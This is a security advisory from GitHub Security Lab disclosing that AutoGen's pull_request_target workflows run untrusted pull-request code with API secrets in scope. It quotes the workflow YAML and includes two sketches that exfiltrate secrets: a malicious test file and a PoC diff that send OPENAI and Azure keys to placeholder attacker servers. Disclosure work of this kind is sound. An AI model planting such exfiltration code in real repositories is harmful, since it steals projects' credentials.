Coordinated Disclosure Timeline

Summary

Several GitHub workflows may leak secret API keys (OpenAI, Azure, Bing, etc.) when triggered by any Pull Request.

Project

AutoGen

Tested Version

v0.2.15

Details

Issue 1: Untrusted checkout leading to secrets exfiltration from a Pull Request in contrib-openai.yml (GHSL-2024-025)

The pull_request_target trigger event used in the contrib-openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.

name: OpenAI4ContribTests

on:
  pull_request_target:
    branches: ['main']
    paths:
      - 'autogen/**'
      - 'test/agentchat/contrib/**'
      - '.github/workflows/contrib-openai.yml'
      - 'setup.py'
permissions: {}
...
RetrieveChatTest:
...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
...
      - name: Coverage
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.py
          coverage xml

By explicitly checking out and running a test script from a fork, the workflow executes untrusted code in an environment that has access to secrets. See Preventing pwn requests for more information.

An attacker could create a pull request with a malicious test/agentchat/contrib/test_qdrant_retrievechat.py which would get access to the secrets stored in the environment variables (e.g. OPENAI_API_KEY, AZURE_OPENAI_API_KEY, BING_API_KEY, etc.).
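As a rough sketch of such a payload (hypothetical, not taken from an actual exploit; the server URL is a placeholder), the malicious test file could look like this:

# test/agentchat/contrib/test_qdrant_retrievechat.py -- attacker-controlled in the PR head.
# Hypothetical sketch: reads the secrets exposed to the Coverage step and
# sends them to an attacker-controlled server.
import os
import urllib.parse
import urllib.request

def test_exfiltrate_secrets():
    # Collect the secret-bearing environment variables the workflow step sets.
    stolen = {
        name: os.environ.get(name, "")
        for name in ("OPENAI_API_KEY", "AZURE_OPENAI_API_KEY", "OAI_CONFIG_LIST")
    }
    # The secrets leave the runner as query parameters of a single HTTPS request.
    urllib.request.urlopen(
        "https://ATTACKER-CONTROLLED-SERVER/?" + urllib.parse.urlencode(stolen)
    )

Because pytest collects and runs this file during the Coverage step, the function executes with the secrets already present in its environment.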

Note that, in addition to the RetrieveChatTest.Coverage step, there are other steps in the same workflow that are also vulnerable to secret exfiltration.

This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.

Proof Of Concept (PoC)

To verify the vulnerability, follow these steps:

Impact

Even though the workflow runs with no write permissions and therefore does not allow unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.
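One possible hardening, sketched below rather than prescribed as the project's fix, is to keep the secret-bearing job from running on unreviewed code by gating it on a maintainer-applied label (a pattern described in Preventing pwn requests; the label name here is a placeholder):

on:
  pull_request_target:
    types: [labeled]
    branches: ['main']
permissions: {}
jobs:
  RetrieveChatTest:
    # Hypothetical gate: the job only runs after a maintainer has reviewed
    # the pull request and applied the 'safe-to-test' label.
    if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}

With this gate, untrusted code from a fork still runs against the secrets, but only after a human has inspected the changes.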

Issue 2: Untrusted checkout leading to secrets exfiltration from a Pull Request in openai.yml (GHSL-2024-026)

Similarly, the pull_request_target trigger event used in the openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.

name: OpenAI

on:
  pull_request_target:
    branches: ["main"]
    paths:
      - "autogen/**"
      - "test/**"
      - "notebook/agentchat_auto_feedback_from_code_execution.ipynb"
      - "notebook/agentchat_function_call.ipynb"
      - "notebook/agentchat_groupchat_finite_state_machine.ipynb"
      - ".github/workflows/openai.yml"
permissions: {}
...
test:
...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
...
      - name: Coverage
        if: matrix.python-version == '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test --ignore=test/agentchat/contrib
          coverage xml
      - name: Coverage and check notebook outputs
        if: matrix.python-version != '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          WOLFRAM_ALPHA_APPID: ${{ secrets.WOLFRAM_ALPHA_APPID }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          pip install nbconvert nbformat ipykernel
          coverage run -a -m pytest test/test_notebook.py
          coverage xml
          cat "$(pwd)/test/executed_openai_notebook_output.txt"

By explicitly checking out and running a test script from a fork, the workflow executes untrusted code in an environment that has access to secrets. See Preventing pwn requests for more information.

An attacker could create a pull request with a malicious Python script in the test/ directory which would get access to the secrets stored in the environment variables (e.g. OPENAI_API_KEY, AZURE_OPENAI_API_KEY).

This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.

Proof Of Concept (PoC)

To verify the vulnerability, open a pull request that adds the following exfiltration code to one of the test files run by the workflow:

+import os, urllib.request
+urllib.request.urlopen(f"https://YOUR-CONTROLLED-SERVER?{os.environ['OPENAI_API_KEY']}")
+
 try:
     import openai
 except ImportError:
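Once the workflow runs the modified tests, the injected request delivers the OPENAI_API_KEY value to the attacker-controlled server.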

Impact

Even though the workflow runs with no write permissions and therefore does not allow unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.

Credit

These issues were discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-025 or GHSL-2024-026 in any communication regarding these issues.